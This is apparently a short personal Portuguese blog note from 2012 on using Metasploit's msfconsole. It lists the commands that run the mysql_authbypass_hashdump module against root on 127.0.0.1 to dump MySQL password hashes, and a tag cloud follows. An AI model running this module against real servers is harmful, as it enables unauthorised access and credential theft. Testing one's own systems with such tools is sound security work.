pra não esquecer…

junho 11th, 2012

msfconsole

Posted by Felipe Olivaes in xalassa

http://www.offensive-security.com/metasploit-unleashed/Msfconsole

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run

Leave a reply


 



nuvem de tags:

24 horas acentuação Apache bash benchmark bios boot celular centos charset comando console Download esxi Firebird firefox http importação intel ipod kinghost legenda Linux lost mod_deflate msn mssql MySQL owner Padel PHP placa mãe portabilidade Postgre SQL recovery root password rewrite shell sinuca sql server svn temporada completa veronica mars vmware Windows ícones